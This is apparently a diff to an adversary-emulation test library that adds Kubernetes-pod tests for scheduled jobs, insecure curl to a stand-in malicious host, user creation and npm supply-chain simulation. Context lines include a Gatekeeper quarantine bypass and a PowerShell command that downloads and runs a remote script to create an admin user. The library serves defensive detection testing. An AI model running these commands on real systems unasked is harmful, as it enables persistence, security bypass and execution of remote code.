+        prereq_command: 'which kubectl
+
+          '
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach
+          --rm -i -- bash -lc "apt-get update -y >/dev/null 2>&1 && apt-get install
+          -y at >/dev/null 2>&1 && (atd || /usr/sbin/atd) && echo ''#{at_command}''
+          | at #{time_spec} && at -l"
+
+          '
   T1556:
     technique:
       type: attack-pattern
@@ -83907,6 +84064,39 @@ command-and-control:
           Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json" -Force -ErrorAction Ignore
         name: powershell
         elevation_required: false
+    - name: Curl Insecure Connection from a Pod
+      auto_generated_guid: 7e2ad0db-1efa-4af2-a77c-bc6e87d7b3f3
+      description: |
+        Launches an Ubuntu pod, installs curl, and executes curl with insecure flags (-k/--insecure)
+        against a target URL. The pod is automatically deleted after execution.
+      supported_platforms:
+      - containers
+      input_arguments:
+        pod_name:
+          description: K8s pod_name to execute the command in
+          type: string
+          default: atomic-insecure-curl
+        remote_url:
+          description: Remote URL to curl
+          type: string
+          default: https://malicious-apt.com
+        image_name:
+          description: Name of the docker image
+          type: string
+          default: curlimages/curl
+      dependencies:
+      - description: kubectl must be installed and configured
+        get_prereq_command: 'echo "kubectl must be installed manually"
+
+          '
+        prereq_command: 'which kubectl
+
+          '
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm
+          -it -- curl -ksL #{remote_url}'
   T1665:
     technique:
       type: attack-pattern
@@ -124816,7 +125006,47 @@ initial-access:
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Metadata'
-    atomic_tests: []
+      identifier: T1195.002
+    atomic_tests:
+    - name: Simulate npm package installation on a Linux system
+      auto_generated_guid: a9604672-cd46-493b-b58f-fd4124c22dd3
+      description: 'Launches a short‑lived Kubernetes pod using the Node 18 image,
+        initializes a minimal npm project in /tmp/test, and installs the specified
+        npm package without audit/fund/package‑lock options, simulating potentially
+        suspicious package retrieval (e.g., typosquatting/dependency confusion) from
+        within a container. The pod is deleted after execution.
+
+        '
+      supported_platforms:
+      - containers
+      - linux
+      input_arguments:
+        image_name:
+          description: Name of the image
+          type: string
+          default: node:18
+        pod_name:
+          description: Name of the pod
+          type: string
+          default: atomic-npm-install
+        package_name:
+          description: NPM package to install
+          type: string
+          default: tinycolor
+      dependencies:
+      - description: kubectl must be installed and configured
+        get_prereq_command: echo "kubectl must be installed"
+        prereq_command: which kubectl
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach
+          --rm -i -- bash -lc "mkdir -p /tmp/test && cd /tmp/test && npm init -y >/dev/null
+          2>&1 && echo ''--- package.json before install ---'' && cat package.json
+          && npm install #{package_name} --no-audit --no-fund --no-package-lock &&
+          echo ''--- package.json after install ---'' && cat package.json"
+
+          '
   T1078.002:
     technique:
       type: attack-pattern

atomics/Indexes/linux-index.yaml

@@ -74330,7 +74330,47 @@ initial-access:
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Metadata'
-    atomic_tests: []
+      identifier: T1195.002
+    atomic_tests:
+    - name: Simulate npm package installation on a Linux system
+      auto_generated_guid: a9604672-cd46-493b-b58f-fd4124c22dd3
+      description: 'Launches a short‑lived Kubernetes pod using the Node 18 image,
+        initializes a minimal npm project in /tmp/test, and installs the specified
+        npm package without audit/fund/package‑lock options, simulating potentially
+        suspicious package retrieval (e.g., typosquatting/dependency confusion) from
+        within a container. The pod is deleted after execution.
+
+        '
+      supported_platforms:
+      - containers
+      - linux
+      input_arguments:
+        image_name:
+          description: Name of the image
+          type: string
+          default: node:18
+        pod_name:
+          description: Name of the pod
+          type: string
+          default: atomic-npm-install
+        package_name:
+          description: NPM package to install
+          type: string
+          default: tinycolor
+      dependencies:
+      - description: kubectl must be installed and configured
+        get_prereq_command: echo "kubectl must be installed"
+        prereq_command: which kubectl
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach
+          --rm -i -- bash -lc "mkdir -p /tmp/test && cd /tmp/test && npm init -y >/dev/null
+          2>&1 && echo ''--- package.json before install ---'' && cat package.json
+          && npm install #{package_name} --no-audit --no-fund --no-package-lock &&
+          echo ''--- package.json after install ---'' && cat package.json"
+
+          '
   T1078.002:
     technique:
       type: attack-pattern

atomics/Indexes/macos-index.yaml

@@ -3500,10 +3500,9 @@ defense-evasion:
           type: path
           default: myapp.app
       executor:
-        command: 'sudo xattr -d com.apple.quarantine #{app_path}
+        command: 'xattr -d com.apple.quarantine #{app_path}
 
           '
-        elevation_required: true
         name: sh
   T1553.002:
     technique:
@@ -69035,6 +69034,7 @@ initial-access:
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Metadata'
+      identifier: T1195.002
     atomic_tests: []
   T1078.002:
     technique:

atomics/Indexes/office-365-index.yaml

@@ -62095,6 +62095,7 @@ initial-access:
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Metadata'
+      identifier: T1195.002
     atomic_tests: []
   T1078.002:
     technique:

atomics/Indexes/saas-index.yaml

@@ -61674,6 +61674,7 @@ initial-access:
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Metadata'
+      identifier: T1195.002
     atomic_tests: []
   T1078.002:
     technique:

atomics/Indexes/windows-index.yaml

@@ -103203,6 +103203,7 @@ initial-access:
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Metadata'
+      identifier: T1195.002
     atomic_tests: []
   T1078.002:
     technique:

atomics/T1053.002/T1053.002.md

@@ -18,6 +18,8 @@ In Linux environments, adversaries may also abuse [at](https://attack.mitre.org/
 
 - [Atomic Test #2 - At - Schedule a job](#atomic-test-2---at---schedule-a-job)
 
+- [Atomic Test #3 - At - Schedule a job via kubectl in a Pod](#atomic-test-3---at---schedule-a-job-via-kubectl-in-a-pod)
+
 
 <br/>
 
@@ -104,4 +106,53 @@ echo 'Please start the `atd` daemon (sysv: `service atd start` ; systemd: `syste
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #3 - At - Schedule a job via kubectl in a Pod
+Launches a short-lived Ubuntu pod, installs the `at` utility, starts the `atd` daemon,
+and submits a job with `at`. The pod is deleted after execution.
+
+**Supported Platforms:** Containers
+
+
+**auto_generated_guid:** 9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| image_name | Name of the image | string | ubuntu|
+| pod_name | K8s pod name to execute the command in | string | atomic-at-schedule|
+| time_spec | Time specification of when the command should run | string | now + 1 minute|
+| at_command | The command to be run | string | echo Hello from Atomic Red Team|
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach --rm -i -- bash -lc "apt-get update -y >/dev/null 2>&1 && apt-get install -y at >/dev/null 2>&1 && (atd || /usr/sbin/atd) && echo '#{at_command}' | at #{time_spec} && at -l"
+```
+
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: kubectl must be installed and configured
+##### Check Prereq Commands:
+```bash
+which kubectl
+```
+##### Get Prereq Commands:
+```bash
+echo "kubectl must be installed manually"
+```
+
+
+
+
 <br/>

atomics/T1053.002/T1053.002.yaml

@@ -54,3 +54,38 @@ atomic_tests:
     elevation_required: false
     command: |-
       echo "#{at_command}" | at #{time_spec}
+- name: At - Schedule a job via kubectl in a Pod
+  auto_generated_guid: 9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213
+  description: |
+    Launches a short-lived Ubuntu pod, installs the `at` utility, starts the `atd` daemon,
+    and submits a job with `at`. The pod is deleted after execution.
+  supported_platforms:
+  - containers
+  input_arguments:
+    image_name:
+      description: Name of the image
+      type: string
+      default: ubuntu
+    pod_name:
+      description: K8s pod name to execute the command in
+      type: string
+      default: atomic-at-schedule
+    time_spec:
+      description: Time specification of when the command should run
+      type: string
+      default: now + 1 minute
+    at_command:
+      description: The command to be run
+      type: string
+      default: echo Hello from Atomic Red Team
+  dependencies:
+  - description: kubectl must be installed and configured
+    get_prereq_command: |
+      echo "kubectl must be installed manually"
+    prereq_command: |
+      which kubectl
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach --rm -i -- bash -lc "apt-get update -y >/dev/null 2>&1 && apt-get install -y at >/dev/null 2>&1 && (atd || /usr/sbin/atd) && echo '#{at_command}' | at #{time_spec} && at -l"

atomics/T1105/T1105.md

@@ -90,6 +90,8 @@ Files can also be transferred using various [Web Service](https://attack.mitre.o
 
 - [Atomic Test #38 - Download a file with OneDrive Standalone Updater](#atomic-test-38---download-a-file-with-onedrive-standalone-updater)
 
+- [Atomic Test #39 - Curl Insecure Connection from a Pod](#atomic-test-39---curl-insecure-connection-from-a-pod)
+
 
 <br/>
 
@@ -1950,4 +1952,52 @@ Write-Host "OneDriveStandaloneUpdater.exe not found at #{onedrive_path}. Please
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #39 - Curl Insecure Connection from a Pod
+Launches an Ubuntu pod, installs curl, and executes curl with insecure flags (-k/--insecure)
+against a target URL. The pod is automatically deleted after execution.
+
+**Supported Platforms:** Containers
+
+
+**auto_generated_guid:** 7e2ad0db-1efa-4af2-a77c-bc6e87d7b3f3
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| pod_name | K8s pod_name to execute the command in | string | atomic-insecure-curl|
+| remote_url | Remote URL to curl | string | https://malicious-apt.com|
+| image_name | Name of the docker image | string | curlimages/curl|
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- curl -ksL #{remote_url}
+```
+
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: kubectl must be installed and configured
+##### Check Prereq Commands:
+```bash
+which kubectl
+```
+##### Get Prereq Commands:
+```bash
+echo "kubectl must be installed manually"
+```
+
+
+
+
 <br/>

atomics/T1105/T1105.yaml

@@ -1268,4 +1268,35 @@ atomic_tests:
       Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json" -Force -ErrorAction Ignore
 
     name: powershell
-    elevation_required: false
+    elevation_required: false
+- name: Curl Insecure Connection from a Pod
+  auto_generated_guid: 7e2ad0db-1efa-4af2-a77c-bc6e87d7b3f3
+  description: |
+    Launches an Ubuntu pod, installs curl, and executes curl with insecure flags (-k/--insecure)
+    against a target URL. The pod is automatically deleted after execution.
+  supported_platforms:
+  - containers
+  input_arguments:
+    pod_name:
+      description: K8s pod_name to execute the command in
+      type: string
+      default: atomic-insecure-curl
+    remote_url:
+      description: Remote URL to curl
+      type: string
+      default: https://malicious-apt.com
+    image_name:
+      description: Name of the docker image
+      type: string
+      default: curlimages/curl
+  dependencies:
+  - description: kubectl must be installed and configured
+    get_prereq_command: |
+      echo "kubectl must be installed manually"
+    prereq_command: |
+      which kubectl
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- curl -ksL #{remote_url}

atomics/T1136.001/T1136.001.md

@@ -30,6 +30,8 @@ Such accounts may be used to establish secondary credentialed access that do not
 
 - [Atomic Test #9 - Create a new Windows admin user via .NET](#atomic-test-9---create-a-new-windows-admin-user-via-net)
 
+- [Atomic Test #10 - Create a Linux user via kubectl in a Pod](#atomic-test-10---create-a-linux-user-via-kubectl-in-a-pod)
+
 
 <br/>
 
@@ -369,4 +371,52 @@ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #10 - Create a Linux user via kubectl in a Pod
+Launches a short-lived Alpine pod and creates a Linux user inside the pod.
+The pod is automatically deleted after execution.
+
+**Supported Platforms:** Containers
+
+
+**auto_generated_guid:** d9efa6c7-6518-42b2-809a-4f2a8e242b9b
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| pod_name | K8s pod_name to execute the command in | string | atomic-linux-useradd|
+| username | Username of the user to create inside the pod | string | evil_user|
+| image_name | Name of the docker image | string | alpine|
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- sh -lc 'adduser -D #{username} && id #{username}'
+```
+
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: kubectl must be installed and configured
+##### Check Prereq Commands:
+```bash
+which kubectl
+```
+##### Get Prereq Commands:
+```bash
+echo "kubectl must be installed manually"
+```
+
+
+
+
 <br/>

atomics/T1136.001/T1136.001.yaml

@@ -185,3 +185,34 @@ atomic_tests:
     command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/0xv1n/dotnetfun/9b3b0d11d1c156909c0b1823cff3004f80b89b1f/Persistence/CreateNewLocalAdmin_ART.ps1')
     name: powershell
     elevation_required: true
+- name: Create a Linux user via kubectl in a Pod
+  auto_generated_guid: d9efa6c7-6518-42b2-809a-4f2a8e242b9b
+  description: |
+    Launches a short-lived Alpine pod and creates a Linux user inside the pod.
+    The pod is automatically deleted after execution.
+  supported_platforms:
+  - containers
+  input_arguments:
+    pod_name:
+      description: K8s pod_name to execute the command in
+      type: string
+      default: atomic-linux-useradd
+    username:
+      description: Username of the user to create inside the pod
+      type: string
+      default: evil_user
+    image_name:
+      description: Name of the docker image
+      type: string
+      default: alpine
+  dependencies:
+  - description: kubectl must be installed and configured
+    get_prereq_command: |
+      echo "kubectl must be installed manually"
+    prereq_command: |
+      which kubectl
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- sh -lc 'adduser -D #{username} && id #{username}'

atomics/T1195.002/T1195.002.md

@@ -0,0 +1,62 @@
+# T1195.002 - Compromise Software Supply Chain
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1195/002)
+<blockquote>
+
+Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.
+
+Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011)  
+
+</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Simulate npm package installation on a Linux system](#atomic-test-1---simulate-npm-package-installation-on-a-linux-system)
+
+
+<br/>
+
+## Atomic Test #1 - Simulate npm package installation on a Linux system
+Launches a short‑lived Kubernetes pod using the Node 18 image, initializes a minimal npm project in /tmp/test, and installs the specified npm package without audit/fund/package‑lock options, simulating potentially suspicious package retrieval (e.g., typosquatting/dependency confusion) from within a container. The pod is deleted after execution.
+
+**Supported Platforms:** Containers, Linux
+
+
+**auto_generated_guid:** a9604672-cd46-493b-b58f-fd4124c22dd3
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| image_name | Name of the image | string | node:18|
+| pod_name | Name of the pod | string | atomic-npm-install|
+| package_name | NPM package to install | string | tinycolor|
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach --rm -i -- bash -lc "mkdir -p /tmp/test && cd /tmp/test && npm init -y >/dev/null 2>&1 && echo '--- package.json before install ---' && cat package.json && npm install #{package_name} --no-audit --no-fund --no-package-lock && echo '--- package.json after install ---' && cat package.json"
+```
+
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: kubectl must be installed and configured
+##### Check Prereq Commands:
+```bash
+which kubectl
+```
+##### Get Prereq Commands:
+```bash
+echo "kubectl must be installed"
+```
+
+
+
+
+<br/>

atomics/T1195.002/T1195.002.yaml

@@ -0,0 +1,32 @@
+attack_technique: T1195.002
+display_name: Compromise Software Supply Chain
+atomic_tests:
+- name: Simulate npm package installation on a Linux system
+  auto_generated_guid: a9604672-cd46-493b-b58f-fd4124c22dd3
+  description: |
+    Launches a short‑lived Kubernetes pod using the Node 18 image, initializes a minimal npm project in /tmp/test, and installs the specified npm package without audit/fund/package‑lock options, simulating potentially suspicious package retrieval (e.g., typosquatting/dependency confusion) from within a container. The pod is deleted after execution.
+  supported_platforms:
+    - containers
+    - linux
+  input_arguments:
+    image_name:
+      description: Name of the image
+      type: string
+      default: node:18
+    pod_name:
+      description: Name of the pod
+      type: string
+      default: atomic-npm-install
+    package_name:
+      description: NPM package to install
+      type: string
+      default: tinycolor
+  dependencies:
+    - description: kubectl must be installed and configured
+      get_prereq_command: echo "kubectl must be installed"
+      prereq_command: which kubectl
+  executor:
+      name: bash
+      elevation_required: false
+      command: |
+        kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach --rm -i -- bash -lc "mkdir -p /tmp/test && cd /tmp/test && npm init -y >/dev/null 2>&1 && echo '--- package.json before install ---' && cat package.json && npm install #{package_name} --no-audit --no-fund --no-package-lock && echo '--- package.json after install ---' && cat package.json"

atomics/T1553.001/T1553.001.md

@@ -45,11 +45,11 @@ Gatekeeper Bypass via command line
 | app_path | Path to app to be used | path | myapp.app|
 
 
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+#### Attack Commands: Run with `sh`! 
 
 
 ```sh
-sudo xattr -d com.apple.quarantine #{app_path}
+xattr -d com.apple.quarantine #{app_path}
 ```
 
 

atomics/T1553.001/T1553.001.yaml

@@ -14,6 +14,5 @@ atomic_tests:
       default: myapp.app
   executor:
     command: |
-      sudo xattr -d com.apple.quarantine #{app_path}
-    elevation_required: true
+      xattr -d com.apple.quarantine #{app_path}
     name: sh

atomics/used_guids.txt

@@ -1767,3 +1767,7 @@ d2a1f4bc-a064-4223-8281-a086dce5423c
 cbb2573a-a6ad-4c87-aef8-6e175598559b
 ac333fe1-ce2b-400b-a117-538634427439
 6e76f56f-2373-4a6c-a63f-98b7b72761f1
+d9efa6c7-6518-42b2-809a-4f2a8e242b9b
+7e2ad0db-1efa-4af2-a77c-bc6e87d7b3f3
+9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213
+a9604672-cd46-493b-b58f-fd4124c22dd3